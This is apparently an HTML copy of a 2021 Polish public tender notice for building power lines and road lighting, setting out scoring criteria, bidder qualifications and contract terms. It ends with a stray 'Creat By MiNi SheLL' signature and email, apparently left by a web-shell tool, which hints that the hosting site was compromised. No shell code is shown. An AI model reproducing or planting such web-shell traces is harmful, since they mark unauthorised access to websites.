</h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt V SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/> 2 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/> 2.1 Zdolności do występowania w obrocie gospodarczym. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/> 2.2 Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/> 2.3 Sytuacji ekonomicznej lub finansowej Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/> 2.4 Zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/> 2.4.1 w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedno zamówienie odpowiadające swoim rodzajem przedmiotowi zamówienia, o wartości nie mniejszej niż 50 000,00 zł brutto (nie dopuszcza się sumowania mniejszych, cząstkowych robót objętych odrębnymi umowami lub zleceniami).<br/> 2.4.2 dysponują osobami zdolnymi do wykonania zamówienia, tj. o niniejsze zamówienie może ubiegać się Wykonawca, który wykaże, że dysponuje lub będzie dysponował:<br/>kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi w branży elektrycznej, <br/>2.4.2.1 Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem.<br/> 2.4.2.2 Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220).<br/> 2.4.2.3 W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych.<br/> 2.4.2.4 Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: 1.1 Formularz oferty przygotowany zgodnie ze wzorem podanym w<br/>Załączniku nr 2 do SWZ;<br/>1.2 Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu, zgodnie z Załącznikiem nr 3 do SWZ;<br/>1.3 Pełnomocnictwo / Pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest<br/>podpisana przez pełnomocnika (o ile upoważnienie to nie wynika z innych dokumentów dołączonych<br/>do oferty). Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak<br/>składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego<br/>stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie<br/>notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego.<br/>1.4 W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (np. konsorcjum), do oferty powinno zostać załączone pełnomocnictwo dla Osoby<br/>Uprawnionej do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i<br/>zawarcia umowy.<br/>1.5 Zobowiązania innych podmiotów do udostępnienia zasobów, jeżeli Wykonawca korzysta z zasobów<br/>innych podmiotów.<br/>1.6 Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na<br/>podstawie art. 117 ust. 4 ustawy, o ile dotyczy (załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy, wg wzoru stanowiącego Załącznik nr 7 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zmiana terminu wykonania zamówienia w zakresie adekwatnym do przyczyny powodującej<br/>konieczność zmiany w następujących przypadkach:<br/>a) opóźnienia w zawarciu umowy, uniemożliwiające rozpoczęcie prac spowodowane w<br/>szczególności korzystaniem przez wykonawców ze środków ochrony prawnej określonych w<br/>PZP lub spowodowane podjętymi ewentualnie przez Zamawiającego czynnościami<br/>zmierzającymi do zwiększenia kwoty jaką może przeznaczyć na sfinansowanie zamówienia,<br/>b) wystąpienia wad Dokumentacji projektowej skutkujących koniecznością dokonania zmian w<br/>Dokumentacji projektowej, jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju<br/>robót mających wpływ na termin wykonania robót,<br/>c) zmian spowodowanych wyjątkowo niesprzyjającymi warunkami klimatycznymi,<br/>uniemożliwiającymi prowadzenie prac lub robót będących przedmiotem umowy,<br/>przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, jeżeli konieczność wykonania prac<br/>lub robót w tym okresie, przeprowadzania prób i sprawdzeń oraz dokonywanie odbiorów nie jest<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność. Wyjątkowo<br/>niesprzyjające warunki klimatyczne to takie warunki, które łącznie:<br/>- biorąc pod uwagę wymogi reżimów technologicznych determinujących wykonanie<br/>poszczególnych robót skutkują wstrzymaniem prowadzenia tychże robót oraz<br/>- ilość dni występowania czynników klimatycznych lub intensywność opadów skutkująca<br/>przeszkodami, o których mowa powyżej jest większa od średniej z ostatniego pięciolecia licząc<br/>od daty składania ofert wstecz, okresem porównawczym będzie miesiąc,<br/>d) wystąpienie siły wyższej np. pożaru, powodzi, itp., o czas w jakim dane zjawisko<br/>uniemożliwiło prowadzenie robót lub o czas jaki jest niezbędny na naprawę uszkodzeń<br/>powstałych w wyniku działania siły wyższej,<br/>e) wstrzymanie robót przez inspektora nadzoru inwestorskiego (Zamawiającego), które nie jest<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlanef) wystąpienia konieczności wykonania robót dodatkowych lub zamiennych, lub w przypadkach<br/>określonych w ppkt. 2, które wstrzymują lub opóźniają realizację przedmiotu umowy,<br/>g) wystąpienie nieprzewidzianych w dokumentacji projektowej warunków archeologicznych,<br/>geologicznych, hydrologicznych lub wstrzymania robót przez właściwy organ z przyczyn nie<br/>zawinionych przez Wykonawcę, np. dokonanie odkrywki archeologicznej, odkrycie niewypału<br/>itp.,<br/>h) zmiany będące następstwem działań bądź zaniechań osób trzecich,<br/>i) zmiany będące następstwem działania organów administracji w szczególności wynikających z<br/>terminów wydania przez organy administracji decyzji, zezwoleń, uzgodnień, opinii, itp.,<br/>j) zmiany przepisów prawa związanych z realizacją niniejszej Umowy,<br/>k) niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich<br/>wykonania z przyczyn niezawinionych przez Wykonawcę.<br/>2) Zmiany zakresu i sposobu wykonania przedmiotu zamówienia, wynagrodzenia lub zmiany<br/>terminu zakończenia robót w zakresie adekwatnym do przyczyny powodującej konieczność<br/>zmiany, w następujących przypadkach:<br/>a) zaistnienie okoliczności powodujących, że wykonanie umowy zgodnie z opracowaną<br/>Dokumentacją projektową nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia<br/>umowy,<br/>b) zmiana ilości wymienionych np.: w pozycjach kosztorysów ofertowych i zbiorczego<br/>zestawienia wartości robót,<br/>c) zmian technologicznych, o ile są korzystne dla Zamawiającego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy Zakupowej dostępnej pod adresem: mniow.ezamawiajacy.pl. w zakładce „OFERTY” 21.07.2021 r. do godziny 11:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-11 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com